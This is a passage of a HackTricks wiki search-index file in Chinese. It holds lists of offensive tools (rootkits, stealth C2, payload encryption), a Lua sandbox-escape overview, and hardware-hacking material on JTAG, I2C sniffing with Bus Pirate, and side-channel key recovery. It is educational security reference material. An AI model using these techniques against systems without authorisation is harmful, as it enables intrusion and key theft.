参考","id":"10239","title":"参考"},"1024":{"body":"以太坊中的交易涉及发送者和接收者,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的关键信息包括接收者、发送者的签名、价值、可选数据、燃料限制和费用。值得注意的是,发送者的地址是从签名中推导出来的,因此在交易数据中不需要它。 这些实践和机制是任何希望参与加密货币,同时优先考虑隐私和安全的人的基础。","breadcrumbs":"Blockchain & Crypto » 执行交易","id":"1024","title":"执行交易"},"10240":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 https://github.com/yarox24/attack_monitor https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/ https://github.com/ION28/BLUESPAWN https://github.com/PaperMtn/lil-pwny : 检查泄露的账户 https://github.com/rabobank-cdc/DeTTECT","breadcrumbs":"More Tools » BlueTeam","id":"10240","title":"BlueTeam"},"10241":{"body":"https://github.com/3vangel1st/kamerka https://github.com/BullsEye0/google_dork_list https://github.com/highmeh/lure https://www.shodan.io/ https://censys.io/ https://viz.greynoise.io/table https://www.zoomeye.org https://fofa.so https://www.onyphe.io https://app.binaryedge.io https://hunter.io https://wigle.net https://ghostproject.fr https://www.oshadan.com/ https://builtwith.com/ https://www.spiderfoot.net/ https://github.com/zricethezav/gitleaks https://www.nmmapper.com/sys/tools/subdomainfinder/ : 8个子域名查找工具,sublist3r,amass等","breadcrumbs":"More Tools » OSINT","id":"10241","title":"OSINT"},"10242":{"body":"https://github.com/AlisamTechnology/ATSCAN https://github.com/momenbasel/KeyFinder https://github.com/hahwul/XSpear https://github.com/BitTheByte/Monitorizer/ https://github.com/spinkham/skipfish https://github.com/blark/aiodnsbrute : 异步暴力破解域名 https://crt.sh/?q=%.yahoo.com : 子域名暴力破解 https://github.com/tomnomnom/httprobe : 检查域中的Web服务器是否可访问 https://github.com/aboul3la/Sublist3r : 子域名发现 https://github.com/gwen001/github-search/blob/master/github-subdomains.py : 在github中发现子域名 https://github.com/robertdavidgraham/masscan : 快速端口扫描 https://github.com/Threezh1/JSFinder : 从Web中的JS文件获取子域名和URL https://github.com/C1h2e1/MyFuzzingDict : Web文件字典 https://github.com/TypeError/Bookmarks/blob/master/README.md : Burp扩展以避免多个重复标签 https://github.com/hakluke/hakrawler : 获取资产 https://github.com/izo30/google-dorker : Google dorks https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md : Web BugBounty检查清单 https://github.com/Naategh/dom-red : 检查域列表以防止开放重定向 https://github.com/prodigysml/Dr.-Watson : Burp插件,离线分析以发现域、子域和IP https://github.com/hahwul/WebHackersWeapons : 不同工具的列表 https://github.com/gauravnarwani97/Trishul : BurpSuite插件以查找漏洞(SQLi,XSS,SSTI) https://github.com/fransr/postMessage-tracker : 用于跟踪post-messages函数的Chrome扩展 https://github.com/Quitten/Autorize : 自动身份验证测试(删除cookies并尝试发送请求) https://github.com/pikpikcu/xrcross : XRCross是一个重建、扫描器和渗透/ BugBounty测试工具。该工具旨在测试(XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI)漏洞","breadcrumbs":"More Tools » WEB","id":"10242","title":"WEB"},"10243":{"body":"https://github.com/Mr-Un1k0d3r/PoisonHandler : 横向移动 https://freddiebarrsmith.com/trix/trix.html : LOL bins https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79 ( https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ ): 持久性 https://github.com/odzhan/injection : Windows进程注入技术 https://github.com/BankSecurity/Red_Team : 红队脚本 https://github.com/l0ss/Grouper2 : 查找Active Directory组策略中的安全相关错误配置。 https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring : Securestring混淆 https://pentestlab.blog/2020/02/24/parent-pid-spoofing/ : 父PID欺骗 https://github.com/the-xentropy/xencrypt : 加密Powershell有效载荷 https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/ : 隐蔽C2 https://windows-internals.com/faxing-your-way-to-system/ : 关于Windows内部的日志系列 https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/ : 跟踪谁打开了文档 https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet : Active Directory备忘单","breadcrumbs":"More Tools » Windows","id":"10243","title":"Windows"},"10244":{"body":"工具q veo q pueden molar para analizar firmares (automaticas): https://github.com/craigz28/firmwalker https://github.com/fkie-cad/FACT_core https://gitlab.com/bytesweep/bytesweep-go Post-crema: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html Como extraer firmware si no lo encontramos online: https://www.youtube.com/watch?v=Kxvpbu9STU4 Aqui un firware con vulnerabilidades para analizar: https://github.com/scriptingxss/IoTGoat y por aqui la metodologia owasp para analizar firmware: https://github.com/scriptingxss/owasp-fstm Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a platform for automating the emulation and dynamic analysis of Linux-based firmware.","breadcrumbs":"More Tools » Firmware","id":"10244","title":"Firmware"},"10245":{"body":"https://twitter.com/HackAndDo/status/1202695084543791117 https://github.com/weev3/LKWA https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/ https://github.com/skelsec/jackdaw https://github.com/CoatiSoftware/Sourcetrail : 静态代码分析 https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html : Bluetooth LE CTF https://github.com/skeeto/endlessh : SSH tarpit that slowly sends an endless banner. AWS and Cloud tools: https://github.com/toniblyx/my-arsenal-of-aws-security-tools IFS (Interplanetary File System) for phising: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/ IP rotation services: https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212 Linux rootkit: https://github.com/aesophor/satanic-rootkit https://theia-ide.org/ : 在线IDE https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/ : 开始BugBounty的资源 https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab : IOS渗透测试工具 https://github.com/random-robbie/keywords/blob/master/keywords.txt : 关键词 https://github.com/ElevenPaths/HomePWN : 黑客IoT(Wifi,BLE,SSDP,MDNS) https://github.com/rackerlabs/scantron : 自动化扫描 https://github.com/doyensec/awesome-electronjs-hacking : 此列表旨在涵盖与Electron.js安全相关的主题。 https://github.com/serain/bbrecon : BB程序的信息 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"More Tools » OTHER","id":"10245","title":"OTHER"},"10246":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » 硬件黑客","id":"10246","title":"硬件黑客"},"10247":{"body":"JTAG 允许执行边界扫描。边界扫描分析某些电路,包括每个引脚的嵌入式边界扫描单元和寄存器。 JTAG 标准定义了 进行边界扫描的特定命令 ,包括以下内容: BYPASS 允许您测试特定芯片,而无需通过其他芯片。 SAMPLE/PRELOAD 在设备正常工作模式下,获取进入和离开设备的数据样本。 EXTEST 设置和读取引脚状态。 它还可以支持其他命令,例如: IDCODE 用于识别设备 INTEST 用于设备的内部测试 当您使用像 JTAGulator 这样的工具时,可能会遇到这些指令。","breadcrumbs":"Hardware Hacking » JTAG","id":"10247","title":"JTAG"},"10248":{"body":"边界扫描包括对四线 测试接入端口 (TAP) 的测试,这是一个通用端口,提供 对 JTAG 测试支持 功能的访问。TAP 使用以下五个信号: 测试时钟输入 ( TCK ) TCK 是定义 TAP 控制器执行单个操作频率的 时钟 (换句话说,跳转到状态机中的下一个状态)。 测试模式选择 ( TMS ) 输入 TMS 控制 有限状态机 。在每个时钟脉冲上,设备的 JTAG TAP 控制器检查 TMS 引脚上的电压。如果电压低于某个阈值,则信号被视为低并解释为 0;如果电压高于某个阈值,则信号被视为高并解释为 1。 测试数据输入 ( TDI ) TDI 是将 数据通过扫描单元发送到芯片 的引脚。每个供应商负责定义该引脚上的通信协议,因为 JTAG 并未定义此内容。 测试数据输出 ( TDO ) TDO 是将 数据从芯片发送出去 的引脚。 测试复位 ( TRST ) 输入 可选的 TRST 将有限状态机 重置为已知良好状态 。或者,如果 TMS 在五个连续的时钟周期内保持为 1,则会调用复位,方式与 TRST 引脚相同,这就是 TRST 是可选的原因。 有时您可以在 PCB 上找到这些引脚的标记。在其他情况下,您可能需要 找到它们 。","breadcrumbs":"Hardware Hacking » 测试接入端口","id":"10248","title":"测试接入端口"},"10249":{"body":"检测 JTAG 端口的最快但最昂贵的方法是使用 JTAGulator ,这是一种专门为此目的创建的设备(尽管它也 可以检测 UART 引脚 )。 它有 24 个通道 ,您可以连接到电路板引脚。然后,它执行 BF 攻击 ,发送所有可能组合的 IDCODE 和 BYPASS 边界扫描命令。如果收到响应,它会显示每个 JTAG 信号对应的通道。 一种更便宜但速度较慢的识别 JTAG 引脚的方法是使用 JTAGenum 加载在 Arduino 兼容的微控制器上。 使用 JTAGenum ,您首先需要 定义您将用于枚举的探测设备的引脚 。您需要参考设备的引脚图,然后将这些引脚与目标设备上的测试点连接。 识别 JTAG 引脚的 第三种方法 是通过 检查 PCB 中的引脚图。在某些情况下,PCB 可能方便地提供 Tag-Connect 接口 ,这清楚地表明该电路板也具有 JTAG 连接器。您可以在 https://www.tag-connect.com/info/ 查看该接口的外观。此外,检查 PCB 上芯片组的 数据表 可能会揭示指向 JTAG 接口的引脚图。","breadcrumbs":"Hardware Hacking » 识别 JTAG 引脚","id":"10249","title":"识别 JTAG 引脚"},"1025":{"body":"https://en.wikipedia.org/wiki/Proof_of_stake https://www.mycryptopedia.com/public-key-private-key-explained/ https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions https://ethereum.org/en/developers/docs/transactions/ https://ethereum.org/en/developers/docs/gas/ https://en.bitcoin.it/wiki/Privacy tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Blockchain & Crypto » 参考文献","id":"1025","title":"参考文献"},"10250":{"body":"SWD 是一种专为调试设计的 ARM 特定协议。 SWD 接口需要 两个引脚 :一个双向的 SWDIO 信号,相当于 JTAG 的 TDI 和 TDO 引脚 以及一个时钟,和 SWCLK ,相当于 JTAG 中的 TCK 。许多设备支持 串行线或 JTAG 调试端口 (SWJ-DP) ,这是一个结合了 JTAG 和 SWD 接口的接口,使您能够将 SWD 或 JTAG 探头连接到目标。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » SDW","id":"10250","title":"SDW"},"10251":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 故障注入攻击包括在电子电路中引入外部干扰以影响其行为,从而导致信息泄露或甚至绕过电路中的某些限制。这种攻击为攻击电子电路打开了许多可能性。这种攻击也被称为电子电路的故障。 有很多方法和媒介可以将故障注入到电子电路中。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Fault Injection Attacks » Fault Injection Attacks","id":"10251","title":"Fault Injection Attacks"},"10252":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » I2C » I2C","id":"10252","title":"I2C"},"10253":{"body":"要测试 Bus Pirate 是否正常工作,将 +5V 连接到 VPU,将 3.3V 连接到 ADC,然后访问 Bus Pirate(例如使用 Tera Term),并使用命令 ~: bash # Use command\\nHiZ>~\\nDisconnect any devices\\nConnect (Vpu to +5V) and (ADC to +3.3V)\\nSpace to continue\\n# Press space\\nCtrl\\nAUX OK\\nMODE LED OK\\nPULLUP H OK\\nPULLUP L OK\\nVREG OK\\nADC and supply\\n5V(4.96) OK\\nVPU(4.96) OK\\n3.3V(3.26) OK\\nADC(3.27) OK\\nBus high\\nMOSI OK\\nCLK OK\\nMISO OK\\nCS OK\\nBus Hi-Z 0\\nMOSI OK\\nCLK OK\\nMISO OK\\nCS OK\\nBus Hi-Z 1\\nMOSI OK\\nCLK OK\\nMISO OK\\nCS OK\\nMODE and VREG LEDs should be on!\\nAny key to exit\\n#Press space\\nFound 0 errors. 如您在前面的命令行中看到的,它显示找到 0 个错误。这在购买后或刷新固件后确认其正常工作非常有用。 要连接到 bus pirate,您可以参考文档: 在这种情况下,我将连接到一个 EPROM:ATMEL901 24C256 PU27: 与 bus pirate 通信时,我使用 Tera Term 连接到 pirate bus COM 端口,设置为 Setup --> Serial Port --> Speed 为 115200。 在以下通信中,您可以找到如何准备 bus pirate 以进行 I2C 通信,以及如何从内存中写入和读取(注释部分使用 \\"#\\",请不要期待在通信中看到该部分): bash # Check communication with buspirate\\ni\\nBus Pirate v3.5\\nCommunity Firmware v7.1 - goo.gl/gCzQnW [HiZ 1-WIRE UART I2C SPI 2WIRE 3WIRE KEYB LCD PIC DIO] Bootloader v4.5\\nDEVID:0x0447 REVID:0x3046 (24FJ64GA00 2 B8)\\nhttp://dangerousprototypes.com # Check voltages\\nI2C>v\\nPinstates:\\n1.(BR) 2.(RD) 3.(OR) 4.(YW) 5.(GN) 6.(BL) 7.(PU) 8.(GR) 9.(WT) 0.(Blk)\\nGND 3.3V 5.0V ADC VPU AUX SCL SDA - -\\nP P P I I I I I I I\\nGND 3.27V 4.96V 0.00V 4.96V L H H L L #Notice how the VPU is in 5V becausethe EPROM needs 5V signals # Get mode options\\nHiZ>m\\n1. HiZ\\n2. 1-WIRE\\n3. UART\\n4. I2C\\n5. SPI\\n6. 2WIRE\\n7. 3WIRE\\n8. KEYB\\n9. LCD\\n10. PIC\\n11. DIO\\nx. exit(without change) # Select I2C\\n(1)>4\\nI2C mode:\\n1. Software\\n2. Hardware # Select Software mode\\n(1)>1\\nSet speed:\\n1. ~5kHz\\n2. ~50kHz\\n3. ~100kHz\\n4. ~240kHz # Select communication spped\\n(1)> 2\\nClutch disengaged!!!\\nTo finish setup, start up the power supplies with command \'W\'\\nReady # Start communication\\nI2C>W\\nPOWER SUPPLIES ON\\nClutch engaged!!! # Get macros\\nI2C>(0)\\n0.Macro menu\\n1.7bit address search\\n2.I2C sniffer #Get addresses of slaves connected\\nI2C>(1)\\nSearching I2C address space. Found devices at:\\n0xA0(0x50 W) 0xA1(0x50 R) # Note that each slave will have a write address and a read address\\n# 0xA0 ad 0xA1 in the previous case # Write \\"BBB\\" in address 0x69\\nI2C>[0xA0 0x00 0x69 0x42 0x42 0x42]\\nI2C START BIT\\nWRITE: 0xA0 ACK\\nWRITE: 0x00 ACK\\nWRITE: 0x69 ACK\\nWRITE: 0x42 ACK\\nWRITE: 0x42 ACK\\nWRITE: 0x42 ACK\\nI2C STOP BIT # Prepare to read from address 0x69\\nI2C>[0xA0 0x00 0x69]\\nI2C START BIT\\nWRITE: 0xA0 ACK\\nWRITE: 0x00 ACK\\nWRITE: 0x69 ACK\\nI2C STOP BIT # Read 20B from address 0x69 configured before\\nI2C>[0xA1 r:20]\\nI2C START BIT\\nWRITE: 0xA1 ACK\\nREAD: 0x42 ACK 0x42 ACK 0x42 ACK 0x20 ACK 0x48 ACK 0x69 ACK 0x20 ACK 0x44 ACK 0x72 ACK 0x65 ACK 0x67 ACK 0x21 ACK 0x20 ACK 0x41 ACK 0x41 ACK 0x41 ACK 0x00 ACK 0xFF ACK 0xFF ACK 0xFF\\nNACK","breadcrumbs":"Hardware Hacking » I2C » Bus Pirate","id":"10253","title":"Bus Pirate"},"10254":{"body":"在这个场景中,我们将嗅探 Arduino 和之前的 EPROM 之间的 I2C 通信,您只需将两个设备连接起来,然后将总线海盗连接到 SCL、SDA 和 GND 引脚: bash I2C>m\\n1. HiZ\\n2. 1-WIRE\\n3. UART\\n4. I2C\\n5. SPI\\n6. 2WIRE\\n7. 3WIRE\\n8. KEYB\\n9. LCD\\n10. PIC\\n11. DIO\\nx. exit(without change) (1)>4\\nI2C mode:\\n1. Software\\n2. Hardware (1)>1\\nSet speed:\\n1. ~5kHz\\n2. ~50kHz\\n3. ~100kHz\\n4. ~240kHz (1)>1\\nClutch disengaged!!!\\nTo finish setup, start up the power supplies with command \'W\'\\nReady # EVEN IF YOU ARE GOING TO SNIFF YOU NEED TO POWER ON! I2C>W\\nPOWER SUPPLIES ON\\nClutch engaged!!! # Start sniffing, you can see we sniffed a write command I2C>(2)\\nSniffer\\nAny key to exit\\n[0xA0+0x00+0x69+0x41+0x41+0x41+0x20+0x48+0x69+0x20+0x44+0x72+0x65+0x67+0x21+0x20+0x41+0x41+0x41+0x00+] tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » I2C » Sniffer","id":"10254","title":"Sniffer"},"10255":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 侧信道攻击通过观察与内部状态 相关 的物理或微架构“泄漏”来恢复秘密,但这些“泄漏” 不是 设备逻辑接口的一部分。 示例包括测量智能卡瞬时电流到滥用网络上的CPU电源管理效应。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 侧信道分析攻击","id":"10255","title":"侧信道分析攻击"},"10256":{"body":"通道 典型目标 仪器 电力消耗 智能卡、物联网MCU、FPGA 示波器 + 分流电阻/高频探头(例如CW503) 电磁场(EM) CPU、RFID、AES加速器 H场探头 + LNA,ChipWhisperer/RTL-SDR 执行时间/缓存 桌面和云CPU 高精度计时器(rdtsc/rdtscp),远程飞行时间 声学/机械 键盘、3D打印机、继电器 MEMS麦克风,激光振动计 光学和热 LED、激光打印机、DRAM 光电二极管/高速相机,红外相机 故障诱导 ASIC/MCU加密 时钟/电压故障,EMFI,激光注入","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 主要泄漏通道","id":"10256","title":"主要泄漏通道"},"10257":{"body":"","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 电力分析","id":"10257","title":"电力分析"},"10258":{"body":"观察 单个 波形并直接将峰值/谷值与操作(例如DES S盒)关联。 python # ChipWhisperer-husky example – capture one AES trace\\nfrom chipwhisperer.capture.api.programmers import STMLink\\nfrom chipwhisperer.capture import CWSession\\ncw = CWSession(project=\'aes\')\\ntrig = cw.scope.trig\\ncw.connect(cw.capture.scopes[0])\\ncw.capture.init()\\ntrace = cw.capture.capture_trace()\\nprint(trace.wave) # numpy array of power samples","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 简单电力分析(SPA)","id":"10258","title":"简单电力分析(SPA)"},"10259":{"body":"获取 N > 1 000 跟踪,假设密钥字节 k,计算 HW/HD 模型并与泄漏进行相关性分析。 python import numpy as np\\ncorr = np.corrcoef(leakage_model(k), traces[:,sample]) CPA 仍然是最先进的技术,但机器学习变体(MLA,深度学习 SCA)现在主导了 ASCAD-v2(2023)等比赛。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » Differential/Correlation Power Analysis (DPA/CPA)","id":"10259","title":"Differential/Correlation Power Analysis (DPA/CPA)"},"1026":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 本页收集了用于枚举并突破嵌入在应用程序中的 Lua “沙箱”的实用技术(尤其是游戏客户端、插件或应用内脚本引擎)。许多引擎暴露出受限的 Lua 环境,但仍会留下可访问的强大全局,这些全局可导致任意命令执行,甚至在暴露字节码加载器时引发本地内存破坏。 关键思路: 将 VM 视为未知环境:枚举 _G,发现哪些危险原语可达。 当 stdout/print 被屏蔽时,滥用 VM 内的任意 UI/IPC 通道作为输出接收器以观察结果。 如果 io/os 被暴露,通常可以直接执行命令(io.popen、os.execute)。 如果暴露了 load/loadstring/loadfile,执行精心构造的 Lua 字节码可以在某些版本中破坏内存安全(≤5.1 的验证器可被绕过;5.2 移除了验证器),从而实现高级利用。","breadcrumbs":"Lua Sandbox Escape » 绕过 Lua 沙箱(嵌入式 VM、游戏客户端)","id":"1026","title":"绕过 Lua 沙箱(嵌入式 VM、游戏客户端)"},"10260":{"body":"近场 EM 探头(500 MHz–3 GHz)泄漏与功率分析相同的信息 而不 插入分流器。2024 年的研究表明,使用频谱相关和低成本 RTL-SDR 前端可以在 >10 cm 的距离内从 STM32 恢复密钥。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 电磁分析 (EMA)","id":"10260","title":"电磁分析 (EMA)"},"10261":{"body":"现代 CPU 通过共享资源泄漏秘密: Hertzbleed (2022) – DVFS 频率缩放与汉明权重相关,允许 远程 提取 EdDSA 密钥。 Downfall / Gather Data Sampling (Intel, 2023) – 瞬态执行读取跨 SMT 线程的 AVX-gather 数据。 Zenbleed (AMD, 2023) & Inception (AMD, 2023) – 投机向量误预测泄漏跨域寄存器。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 定时与微架构攻击","id":"10261","title":"定时与微架构攻击"},"10262":{"body":"2024 年的 \\"​iLeakKeys\\" 显示从 智能手机麦克风通过 Zoom 恢复笔记本电脑按键的准确率为 95% ,使用 CNN 分类器。 高速光电二极管捕获 DDR4 活动 LED,并在 <1 分钟内重构 AES 轮密钥(BlackHat 2023)。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 声学与光学攻击","id":"10262","title":"声学与光学攻击"},"10263":{"body":"将故障与侧信道泄漏结合可以快捷地搜索密钥(例如 1-trace AES DFA)。最近的业余爱好者价格工具: ChipSHOUTER & PicoEMP – 亚 1 ns 电磁脉冲故障。 GlitchKit-R5 (2025) – 开源时钟/电压故障平台,支持 RISC-V SoC。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 故障注入与差分故障分析 (DFA)","id":"10263","title":"故障注入与差分故障分析 (DFA)"},"10264":{"body":"确定泄漏通道和安装点(VCC 引脚,去耦电容,近场点)。 插入触发器(GPIO 或基于模式)。 收集 >1 k 跟踪,使用适当的采样/过滤器。 预处理(对齐,均值去除,低通/高通滤波,小波,PCA)。 统计或 ML 密钥恢复(CPA,MIA,DL-SCA)。 验证并对异常值进行迭代。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 典型攻击工作流程","id":"10264","title":"典型攻击工作流程"},"10265":{"body":"恒定时间 实现和内存硬算法。 掩码/洗牌 – 将秘密分割成随机份额;第一阶抗性由 TVLA 认证。 隐藏 – 芯片内电压调节器,随机时钟,双轨逻辑,EM 屏蔽。 故障检测 – 冗余计算,阈值签名。 操作 – 在加密内核中禁用 DVFS/涡轮,隔离 SMT,禁止在多租户云中共存。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 防御与加固","id":"10265","title":"防御与加固"},"10266":{"body":"ChipWhisperer-Husky (2024) – 500 MS/s 示波器 + Cortex-M 触发器;Python API 如上。 Riscure Inspector & FI – 商业,支持自动化泄漏评估(TVLA-2.0)。 scaaml – 基于 TensorFlow 的深度学习 SCA 库(v1.2 – 2025)。 pyecsca – ANSSI 开源 ECC SCA 框架。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 工具与框架","id":"10266","title":"工具与框架"},"10267":{"body":"ChipWhisperer Documentation Hertzbleed Attack Paper tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 参考文献","id":"10267","title":"参考文献"},"10268":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » UART » UART","id":"10268","title":"UART"},"10269":{"body":"UART是一种串行协议,这意味着它一次传输一个比特的数据。相比之下,平行通信协议通过多个通道同时传输数据。常见的串行协议包括RS-232、I2C、SPI、CAN、以太网、HDMI、PCI Express和USB。 通常,在UART处于空闲状态时,线路保持高电平(逻辑1值)。然后,为了信号数据传输的开始,发射器向接收器发送一个起始位,此时信号保持低电平(逻辑0值)。接下来,发射器发送五到八个数据位,包含实际消息,后面跟着一个可选的奇偶校验位和一个或两个停止位(逻辑1值),具体取决于配置。用于错误检查的奇偶校验位在实际中很少见。停止位(或位)表示传输结束。 我们称最常见的配置为8N1:八个数据位,无奇偶校验,一个停止位。例如,如果我们想在8N1 UART配置中发送字符C,或ASCII中的0x43,我们将发送以下位:0(起始位);0, 1, 0, 0, 0, 0, 1, 1(0x43的二进制值),和0(停止位)。 与UART通信的硬件工具: USB转串行适配器 带有CP2102或PL2303芯片的适配器 多功能工具,如:Bus Pirate、Adafruit FT232H、Shikra或Attify Badge","breadcrumbs":"Hardware Hacking » 